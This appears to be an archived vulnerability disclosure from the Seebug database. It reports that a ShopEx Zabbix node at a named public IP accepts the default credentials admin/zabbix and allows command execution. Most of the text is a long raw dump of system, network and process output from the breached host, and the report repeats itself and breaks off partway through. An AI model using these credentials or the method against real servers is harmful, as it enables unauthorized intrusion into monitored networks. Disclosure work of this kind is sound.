ShopEx某zabbix节点弱口令,导致命令执行(可入内网)

2015-01-20T00:00:00
ID SSV:93557
Type seebug
Reporter Root
Modified 2015-01-20T00:00:00

Description

简要描述:

国内少见,还在坚持使用zabbix node做为分布式监控。

详细说明:

1

站点:http://202.108.13.148/ 默认账号:admin 默认口令:zabbix

2

使用node节点模式,建立一个层次结构的分布式监控。每一个节点是一个完整的zabbix服务器,和负责监视它自己的位置,zabbx支持高达一千个节点的分布式安装。

<img src="https://images.seebug.org/upload/201501/2022202051d83f3d3a196628a433dfc274dfc15c.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">

使用node节点的好处: 1、在大型的网络中,涉及多个地点建立一个多层次的监控,在层次结构中的节点会将监控的数据传输给其主节点。 2、一个节点可以在本地配置或通过拥有所有节点配置的主节点配置。 3、数据收集将变得更加可靠。如果主节点和子节点之间的通信发生故障时,节点可以保持正常运行状态,采集的数据信息和事件将存储在本地。当主节点和子节点的连接恢复时,子节点将有选择地将数据发送到主节点。 4、节点可以脱离成一个单一的zabbix服务器的工作,能独立监视数千台主机。 新节点的添加和删除,不影响现有节点的配置。无需重新启动所需的任何节点。 5、但是zabbix官网已在最新版本的2.4.x中不再支持Node分布式,转而大力支持Server--Proxy分布式方式,也已成为国内外的分布式监控主流。

3

<img src="https://images.seebug.org/upload/201501/20222037ecb9026b544e2ebf7adb216ce5552ab9.jpg" alt="10.jpg" width="600" onerror="javascript:errimg(this);">

命令执行:

<img src="https://images.seebug.org/upload/201501/20222200a9220efaac7c4569ba0b9233c902889f.jpg" alt="12.jpg" width="600" onerror="javascript:errimg(this);">

Linux tsung 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux eth0 Link encap:Ethernet HWaddr 5C:F3:FC:E6:67:DC inet addr:192.168.8.17 Bcast:192.168.8.255 Mask:255.255.255.0 inet6 addr: fe80::5ef3:fcff:fee6:67dc/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:7037072758 errors:0 dropped:81 overruns:0 frame:0 TX packets:6895316171 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:879919283899 (819.4 GiB) TX bytes:530615890165 (494.1 GiB) Interrupt:169 Memory:92000000-92012800 eth1 Link encap:Ethernet HWaddr 5C:F3:FC:E6:67:DE BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:114 Memory:94000000-94012800 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:1598692172 errors:0 dropped:0 overruns:0 frame:0 TX packets:1598692172 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:101267278193 (94.3 GiB) TX bytes:101267278193 (94.3 GiB) sit0 Link encap:IPv6-in-IPv4 NOARP MTU:1480 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) usb0 Link encap:Ethernet HWaddr 5E:F3:FC:DE:67:DF inet addr:169.254.95.120 Bcast:169.254.95.255 Mask:255.255.255.0 inet6 addr: fe80::5cf3:fcff:fede:67df/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:37061848 errors:0 dropped:0 overruns:0 frame:0 TX packets:18561925 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2503136145 (2.3 GiB) TX bytes:883141024 (842.2 MiB) UID PID PPID C STIME TTY TIME CMD root 1 0 0 2012 ? 00:02:48 init [3] root 2 1 0 2012 ? 00:00:00 [migration/0] root 3 1 0 2012 ? 00:00:04 [ksoftirqd/0] root 4 1 0 2012 ? 00:00:00 [watchdog/0] root 5 1 0 2012 ? 00:04:33 [migration/1] root 6 1 0 2012 ? 00:00:08 [ksoftirqd/1] root 7 1 0 2012 ? 00:00:00 [watchdog/1] root 8 1 0 2012 ? 00:03:23 [migration/2] root 9 1 0 2012 ? 00:05:37 [ksoftirqd/2] root 10 1 0 2012 ? 00:00:00 [watchdog/2] root 11 1 0 2012 ? 00:03:02 [migration/3] root 12 1 0 2012 ? 00:06:16 [ksoftirqd/3] root 13 1 0 2012 ? 00:00:00 [watchdog/3] root 14 1 0 2012 ? 00:00:02 [events/0] root 15 1 0 2012 ? 00:00:02 [events/1] root 16 1 0 2012 ? 00:00:03 [events/2] root 17 1 0 2012 ? 00:00:03 [events/3] root 18 1 0 2012 ? 00:00:00 [khelper] root 99 1 0 2012 ? 00:00:00 [kthread] root 106 99 0 2012 ? 00:00:09 [kblockd/0] root 107 99 0 2012 ? 00:05:52 [kblockd/1] root 108 99 0 2012 ? 00:12:08 [kblockd/2] root 109 99 0 2012 ? 00:12:50 [kblockd/3] root 110 99 0 2012 ? 00:00:00 [kacpid] root 253 99 0 2012 ? 00:00:00 [cqueue/0] root 254 99 0 2012 ? 00:00:00 [cqueue/1] root 255 99 0 2012 ? 00:00:00 [cqueue/2] root 256 99 0 2012 ? 00:00:00 [cqueue/3] root 259 99 0 2012 ? 00:00:00 [khubd] root 261 99 0 2012 ? 00:00:00 [kseriod] zabbix 301 1 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 303 301 0 2014 ? 00:29:11 /usr/local/zabbix2/sbin/zabbix_server zabbix 304 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 305 301 0 2014 ? 01:46:05 /usr/local/zabbix2/sbin/zabbix_server zabbix 306 301 0 2014 ? 01:45:56 /usr/local/zabbix2/sbin/zabbix_server zabbix 307 301 0 2014 ? 01:45:52 /usr/local/zabbix2/sbin/zabbix_server zabbix 308 301 0 2014 ? 01:45:49 /usr/local/zabbix2/sbin/zabbix_server zabbix 309 301 0 2014 ? 01:46:04 /usr/local/zabbix2/sbin/zabbix_server zabbix 310 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 311 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 312 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 313 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 314 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 316 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 317 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 320 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 321 301 0 2014 ? 00:01:16 /usr/local/zabbix2/sbin/zabbix_server zabbix 323 301 0 2014 ? 00:34:23 /usr/local/zabbix2/sbin/zabbix_server zabbix 325 301 0 2014 ? 00:00:45 /usr/local/zabbix2/sbin/zabbix_server zabbix 327 301 0 2014 ? 00:00:02 /usr/local/zabbix2/sbin/zabbix_server zabbix 329 301 0 2014 ? 00:20:26 /usr/local/zabbix2/sbin/zabbix_server zabbix 330 301 0 2014 ? 00:20:12 /usr/local/zabbix2/sbin/zabbix_server zabbix 332 301 0 2014 ? 00:20:17 /usr/local/zabbix2/sbin/zabbix_server zabbix 334 301 0 2014 ? 00:20:14 /usr/local/zabbix2/sbin/zabbix_server zabbix 336 301 0 2014 ? 00:00:01 /usr/local/zabbix2/sbin/zabbix_server zabbix 339 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 340 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server root 354 99 0 2012 ? 00:00:00 [khungtaskd] root 357 99 0 2012 ? 01:52:21 [kswapd0] root 358 99 0 2012 ? 00:00:00 [aio/0] root 359 99 0 2012 ? 00:00:00 [aio/1] root 360 99 0 2012 ? 00:00:00 [aio/2] root 361 99 0 2012 ? 00:00:00 [aio/3] root 516 99 0 2012 ? 00:00:00 [kpsmoused] root 563 99 0 2012 ? 00:00:00 [scsi_eh_0] root 574 99 0 2012 ? 00:00:00 [ata/0] root 575 99 0 2012 ? 00:00:00 [ata/1] root 576 99 0 2012 ? 00:00:00 [ata/2] root 577 99 0 2012 ? 00:00:00 [ata/3] root 578 99 0 2012 ? 00:00:00 [ata_aux] root 584 99 0 2012 ? 00:00:00 [scsi_eh_1] root 585 99 0 2012 ? 00:00:00 [scsi_eh_2] root 586 99 0 2012 ? 00:00:00 [scsi_eh_3] root 587 99 0 2012 ? 00:00:00 [scsi_eh_4] root 603 99 0 2012 ? 00:00:00 [kstriped] root 624 99 0 2012 ? 2-00:42:38 [kjournald] root 649 99 0 2012 ? 00:00:47 [kauditd] root 1304 1 0 2014 ? 00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/data/ --pid-file=/tmp/mysql.pid mysql 1515 1304 5 2014 ? 14-11:51:55 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql --log-error=/usr/local/mysql/data//tsung.err --pid-file=/tmp/mysql.pid --socket=/tmp/mysql.sock --port=3306 root 1856 99 0 2012 ? 00:00:00 [kmpathd/0] root 1857 99 0 2012 ? 00:00:00 [kmpathd/1] root 1858 99 0 2012 ? 00:00:00 [kmpathd/2] root 1859 99 0 2012 ? 00:00:00 [kmpathd/3] root 1860 99 0 2012 ? 00:00:00 [kmpath_handlerd] root 1926 99 0 2012 ? 00:00:00 [kjournald] root 2115 99 0 2012 ? 00:05:34 [kjournald] root 2584 1 0 2012 ? 00:01:32 /sbin/dhclient -1 -q -lf /var/lib/dhclient/dhclient-usb0.leases -pf /var/run/dhclient-usb0.pid usb0 root 2667 1 0 2012 ? 04:25:00 syslogd -m 0 root 2670 1 0 2012 ? 00:00:00 klogd -x root 2725 99 0 2012 ? 00:00:00 [kondemand/0] root 2726 99 0 2012 ? 00:00:00 [kondemand/1] root 2727 99 0 2012 ? 00:00:02 [kondemand/2] root 2728 99 0 2012 ? 00:00:03 [kondemand/3] root 2745 1 0 2012 ? 00:11:36 irqbalance rpc 2765 1 0 2012 ? 00:00:00 portmap root 2798 99 0 2012 ? 00:00:00 [rpciod/0] root 2799 99 0 2012 ? 00:00:00 [rpciod/1] root 2800 99 0 2012 ? 00:00:00 [rpciod/2] root 2801 99 0 2012 ? 00:00:00 [rpciod/3] dbus 2866 1 0 2012 ? 00:07:15 dbus-daemon --system root 2889 1 0 2012 ? 00:00:00 /usr/sbin/hcid root 2893 1 0 2012 ? 00:00:00 /usr/sbin/sdpd root 2924 1 0 2012 ? 00:00:00 [krfcommd] root 2984 1 0 2012 ? 00:00:00 /usr/sbin/acpid 68 2997 1 0 2012 ? 00:00:05 hald root 2998 2997 0 2012 ? 00:00:00 hald-runner 68 3006 2998 0 2012 ? 00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket root 3037 1 0 2012 ? 00:00:00 /usr/bin/hidd --server root 3148 1 0 2012 ? 00:00:00 gpm -m /dev/input/mice -t exps2 root 3163 1 0 2012 ? 00:01:15 crond xfs 3192 1 0 2012 ? 00:00:00 xfs -droppriv -daemon root 3217 1 0 2012 ? 00:00:00 /usr/sbin/atd root 3272 1 0 2012 ? 00:00:00 /usr/sbin/smartd -q never root 3275 1 0 2012 tty1 00:00:00 /sbin/mingetty tty1 root 3276 1 0 2012 tty2 00:00:00 /sbin/mingetty tty2 root 3277 1 0 2012 tty3 00:00:00 /sbin/mingetty tty3 root 3280 1 0 2012 tty4 00:00:00 /sbin/mingetty tty4 root 3281 1 0 2012 tty5 00:00:00 /sbin/mingetty tty5 root 3286 1 0 2012 tty6 00:00:00 /sbin/mingetty tty6 root 3331 1 0 2012 ? 00:39:34 /usr/bin/python -tt /usr/sbin/yum-updatesd root 3333 1 0 2012 ? 00:00:07 /usr/libexec/gam_server root 7190 20289 1 22:04 ? 00:00:04 sendmail: ./t0J94UmK006337 from queue root 7265 3163 0 22:09 ? 00:00:00 crond root 7266 7265 0 22:09 ? 00:00:00 [ntpdate] &lt;defunct&gt; root 7267 7265 0 22:09 ? 00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t root 7270 1 0 22:09 ? 00:00:00 sendmail: ./t0KE95BR007268 man001.localdomain.: user open zabbix 7272 316 0 22:09 ? 00:00:00 sh -c uname -a && ifconfig -a &&ps -ef zabbix 7275 7272 0 22:09 ? 00:00:00 ps -ef root 8886 1 0 2014 ? 00:00:00 SCREEN -S awstats root 8887 8886 0 2014 pts/4 00:00:00 /bin/bash zabbix 13537 1 0 2014 ? 00:00:00 /bin/sh -i root 16102 99 0 2014 ? 00:01:46 [pdflush] root 16851 1 0 2012 ? 00:00:00 /sbin/udevd -d www 19090 26259 0 04:05 ? 00:00:00 nginx: worker process www 19091 26259 0 04:05 ? 00:00:00 nginx: worker process www 19092 26259 0 04:05 ? 00:00:00 nginx: worker process www 19098 26259 0 04:05 ? 00:00:00 nginx: worker process zabbix 19913 1 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19914 19913 0 2014 ? 00:00:48 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19915 19913 0 2014 ? 00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19916 19913 0 2014 ? 00:09:53 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19918 19913 0 2014 ? 00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd root 20289 1 0 2012 ? 00:15:05 sendmail: accepting connections smmsp 20297 1 0 2012 ? 00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue root 20338 1 0 2012 ? 01:19:29 auditd root 20340 20338 0 2012 ? 00:08:56 /sbin/audispd root 20587 1 0 2012 ? 00:10:08 /usr/sbin/sshd root 20613 1 0 2012 ? 00:03:27 pcscd root 20682 1 0 2012 ? 00:00:00 rpc.idmapd rpcuser 20735 1 0 2012 ? 00:00:00 rpc.statd root 20952 1 0 2012 ? 00:00:05 automount root 20990 1 0 2012 ? 00:00:00 cupsd avahi 21064 1 0 2012 ? 00:00:03 avahi-daemon: running [lenovo-man001.local] avahi 21065 21064 0 2012 ? 00:00:00 avahi-daemon: chroot helper root 21444 1 0 2012 ? 00:00:00 /usr/local/lib/erlang/erts-5.7.2/bin/epmd -daemon root 26259 1 0 2014 ? 00:00:01 nginx: master process /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf www 27821 1 0 2012 ? 00:00:02 /usr/local/memcached/bin/memcached -d -m 64 -uwww -p 11211 root 28668 99 0 2014 ? 00:01:01 [pdflush] root 29312 1 0 2014 ? 00:00:06 php-fpm: master process (/usr/local/php/etc/php-fpm.conf) www 29313 29312 0 2014 ? 00:05:57 php-fpm: pool www www 29314 29312 0 2014 ? 00:05:54 php-fpm: pool www www 29315 29312 0 2014 ? 00:05:55 php-fpm: pool www www 29316 29312 0 2014 ? 00:06:07 php-fpm: pool www www 29317 29312 0 2014 ? 00:06:06 php-fpm: pool www www 29318 29312 0 2014 ? 00:05:58 php-fpm: pool www www 29319 29312 0 2014 ? 00:05:48 php-fpm: pool www www 29320 29312 0 2014 ? 00:05:51 php-fpm: pool www www 29321 29312 0 2014 ? 00:05:58 php-fpm: pool www www 29322 29312 0 2014 ? 00:05:52 php-fpm: pool www www 29323 29312 0 2014 ? 00:06:01 php-fpm: pool www www 29324 29312 0 2014 ? 00:05:48 php-fpm: pool www www 29325 29312 0 2014 ? 00:05:52 php-fpm: pool www www 29326 29312 0 2014 ? 00:06:04 php-fpm: pool www www 29327 29312 0 2014 ? 00:05:51 php-fpm: pool www www 29328 29312 0 2014 ? 00:05:58 php-fpm: pool www www 29329 29312 0 2014 ? 00:05:55 php-fpm: pool www www 29330 29312 0 2014 ? 00:06:01 php-fpm: pool www www 29331 29312 0 2014 ? 00:05:46 php-fpm: pool www www 29332 29312 0 2014 ? 00:05:53 php-fpm: pool www root 30862 1 0 2012 ? 01:39:45 /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid -a zabbix 31513 1 0 2014 ? 00:00:00 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31515 31513 0 2014 ? 00:23:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31516 31513 0 2014 ? 00:00:31 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31517 31513 0 2014 ? 08:59:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31518 31513 0 2014 ? 00:09:46 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31519 31513 0 2014 ? 00:00:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31520 31513 0 2014 ? 01:35:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31521 31513 0 2014 ? 02:15:26 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31522 31513 0 2014 ? 00:04:27 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31523 31513 0 2014 ? 00:05:55 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31524 31513 0 2014 ? 00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31525 31513 0 2014 ? 00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31526 31513 0 2014 ? 00:05:51 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31527 31513 0 2014 ? 00:05:53 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31529 31513 0 2014 ? 00:00:47 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31530 31513 0 2014 ? 00:00:03 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31533 31513 0 2014 ? 04:10:50 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31534 31513 0 2014 ? 00:20:52 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31535 31513 0 2014 ? 1-14:44:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31538 31513 0 2014 ? 00:08:15 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31542 31513 0 2014 ? 00:00:28 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31543 31513 0 2014 ? 02:13:29 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31544 31513 0 2014 ? 02:13:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31546 31513 0 2014 ? 02:13:37 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31548 31513 0 2014 ? 02:14:10 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31549 31513 0 2014 ? 00:02:09 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31550 31513 0 2014 ? 00:00:23 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31551 31513 0 2014 ? 00:00:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf

漏洞证明:

1

站点:http://202.108.13.148/ 默认账号:admin 默认口令:zabbix

2

使用node节点模式,建立一个层次结构的分布式监控。每一个节点是一个完整的zabbix服务器,和负责监视它自己的位置,zabbx支持高达一千个节点的分布式安装。

<img src="https://images.seebug.org/upload/201501/2022202051d83f3d3a196628a433dfc274dfc15c.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">

使用node节点的好处: 1、在大型的网络中,涉及多个地点建立一个多层次的监控,在层次结构中的节点会将监控的数据传输给其主节点。 2、一个节点可以在本地配置或通过拥有所有节点配置的主节点配置。 3、数据收集将变得更加可靠。如果主节点和子节点之间的通信发生故障时,节点可以保持正常运行状态,采集的数据信息和事件将存储在本地。当主节点和子节点的连接恢复时,子节点将有选择地将数据发送到主节点。 4、节点可以脱离成一个单一的zabbix服务器的工作,能独立监视数千台主机。 新节点的添加和删除,不影响现有节点的配置。无需重新启动所需的任何节点。 5、但是zabbix官网已在最新版本的2.4.x中不再支持Node分布式,转而大力支持Server--Proxy分布式方式,也已成为国内外的分布式监控主流。

3

<img src="https://images.seebug.org/upload/201501/20222037ecb9026b544e2ebf7adb216ce5552ab9.jpg" alt="10.jpg" width="600" onerror="javascript:errimg(this);">

命令执行:

<img src="https://images.seebug.org/upload/201501/20222200a9220efaac7c4569ba0b9233c902889f.jpg" alt="12.jpg" width="600" onerror="javascript:errimg(this);">

Linux tsung 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux eth0 Link encap:Ethernet HWaddr 5C:F3:FC:E6:67:DC inet addr:192.168.8.17 Bcast:192.168.8.255 Mask:255.255.255.0 inet6 addr: fe80::5ef3:fcff:fee6:67dc/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:7037072758 errors:0 dropped:81 overruns:0 frame:0 TX packets:6895316171 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:879919283899 (819.4 GiB) TX bytes:530615890165 (494.1 GiB) Interrupt:169 Memory:92000000-92012800 eth1 Link encap:Ethernet HWaddr 5C:F3:FC:E6:67:DE BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:114 Memory:94000000-94012800 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:1598692172 errors:0 dropped:0 overruns:0 frame:0 TX packets:1598692172 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:101267278193 (94.3 GiB) TX bytes:101267278193 (94.3 GiB) sit0 Link encap:IPv6-in-IPv4 NOARP MTU:1480 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) usb0 Link encap:Ethernet HWaddr 5E:F3:FC:DE:67:DF inet addr:169.254.95.120 Bcast:169.254.95.255 Mask:255.255.255.0 inet6 addr: fe80::5cf3:fcff:fede:67df/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:37061848 errors:0 dropped:0 overruns:0 frame:0 TX packets:18561925 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2503136145 (2.3 GiB) TX bytes:883141024 (842.2 MiB) UID PID PPID C STIME TTY TIME CMD root 1 0 0 2012 ? 00:02:48 init [3] root 2 1 0 2012 ? 00:00:00 [migration/0] root 3 1 0 2012 ? 00:00:04 [ksoftirqd/0] root 4 1 0 2012 ? 00:00:00 [watchdog/0] root 5 1 0 2012 ? 00:04:33 [migration/1] root 6 1 0 2012 ? 00:00:08 [ksoftirqd/1] root 7 1 0 2012 ? 00:00:00 [watchdog/1] root 8 1 0 2012 ? 00:03:23 [migration/2] root 9 1 0 2012 ? 00:05:37 [ksoftirqd/2] root 10 1 0 2012 ? 00:00:00 [watchdog/2] root 11 1 0 2012 ? 00:03:02 [migration/3] root 12 1 0 2012 ? 00:06:16 [ksoftirqd/3] root 13 1 0 2012 ? 00:00:00 [watchdog/3] root 14 1 0 2012 ? 00:00:02 [events/0] root 15 1 0 2012 ? 00:00:02 [events/1] root 16 1 0 2012 ? 00:00:03 [events/2] root 17 1 0 2012 ? 00:00:03 [events/3] root 18 1 0 2012 ? 00:00:00 [khelper] root 99 1 0 2012 ? 00:00:00 [kthread] root 106 99 0 2012 ? 00:00:09 [kblockd/0] root 107 99 0 2012 ? 00:05:52 [kblockd/1] root 108 99 0 2012 ? 00:12:08 [kblockd/2] root 109 99 0 2012 ? 00:12:50 [kblockd/3] root 110 99 0 2012 ? 00:00:00 [kacpid] root 253 99 0 2012 ? 00:00:00 [cqueue/0] root 254 99 0 2012 ? 00:00:00 [cqueue/1] root 255 99 0 2012 ? 00:00:00 [cqueue/2] root 256 99 0 2012 ? 00:00:00 [cqueue/3] root 259 99 0 2012 ? 00:00:00 [khubd] root 261 99 0 2012 ? 00:00:00 [kseriod] zabbix 301 1 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 303 301 0 2014 ? 00:29:11 /usr/local/zabbix2/sbin/zabbix_server zabbix 304 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 305 301 0 2014 ? 01:46:05 /usr/local/zabbix2/sbin/zabbix_server zabbix 306 301 0 2014 ? 01:45:56 /usr/local/zabbix2/sbin/zabbix_server zabbix 307 301 0 2014 ? 01:45:52 /usr/local/zabbix2/sbin/zabbix_server zabbix 308 301 0 2014 ? 01:45:49 /usr/local/zabbix2/sbin/zabbix_server zabbix 309 301 0 2014 ? 01:46:04 /usr/local/zabbix2/sbin/zabbix_server zabbix 310 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 311 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 312 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 313 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 314 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 316 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 317 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 320 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 321 301 0 2014 ? 00:01:16 /usr/local/zabbix2/sbin/zabbix_server zabbix 323 301 0 2014 ? 00:34:23 /usr/local/zabbix2/sbin/zabbix_server zabbix 325 301 0 2014 ? 00:00:45 /usr/local/zabbix2/sbin/zabbix_server zabbix 327 301 0 2014 ? 00:00:02 /usr/local/zabbix2/sbin/zabbix_server zabbix 329 301 0 2014 ? 00:20:26 /usr/local/zabbix2/sbin/zabbix_server zabbix 330 301 0 2014 ? 00:20:12 /usr/local/zabbix2/sbin/zabbix_server zabbix 332 301 0 2014 ? 00:20:17 /usr/local/zabbix2/sbin/zabbix_server zabbix 334 301 0 2014 ? 00:20:14 /usr/local/zabbix2/sbin/zabbix_server zabbix 336 301 0 2014 ? 00:00:01 /usr/local/zabbix2/sbin/zabbix_server zabbix 339 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server zabbix 340 301 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_server root 354 99 0 2012 ? 00:00:00 [khungtaskd] root 357 99 0 2012 ? 01:52:21 [kswapd0] root 358 99 0 2012 ? 00:00:00 [aio/0] root 359 99 0 2012 ? 00:00:00 [aio/1] root 360 99 0 2012 ? 00:00:00 [aio/2] root 361 99 0 2012 ? 00:00:00 [aio/3] root 516 99 0 2012 ? 00:00:00 [kpsmoused] root 563 99 0 2012 ? 00:00:00 [scsi_eh_0] root 574 99 0 2012 ? 00:00:00 [ata/0] root 575 99 0 2012 ? 00:00:00 [ata/1] root 576 99 0 2012 ? 00:00:00 [ata/2] root 577 99 0 2012 ? 00:00:00 [ata/3] root 578 99 0 2012 ? 00:00:00 [ata_aux] root 584 99 0 2012 ? 00:00:00 [scsi_eh_1] root 585 99 0 2012 ? 00:00:00 [scsi_eh_2] root 586 99 0 2012 ? 00:00:00 [scsi_eh_3] root 587 99 0 2012 ? 00:00:00 [scsi_eh_4] root 603 99 0 2012 ? 00:00:00 [kstriped] root 624 99 0 2012 ? 2-00:42:38 [kjournald] root 649 99 0 2012 ? 00:00:47 [kauditd] root 1304 1 0 2014 ? 00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/data/ --pid-file=/tmp/mysql.pid mysql 1515 1304 5 2014 ? 14-11:51:55 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql --log-error=/usr/local/mysql/data//tsung.err --pid-file=/tmp/mysql.pid --socket=/tmp/mysql.sock --port=3306 root 1856 99 0 2012 ? 00:00:00 [kmpathd/0] root 1857 99 0 2012 ? 00:00:00 [kmpathd/1] root 1858 99 0 2012 ? 00:00:00 [kmpathd/2] root 1859 99 0 2012 ? 00:00:00 [kmpathd/3] root 1860 99 0 2012 ? 00:00:00 [kmpath_handlerd] root 1926 99 0 2012 ? 00:00:00 [kjournald] root 2115 99 0 2012 ? 00:05:34 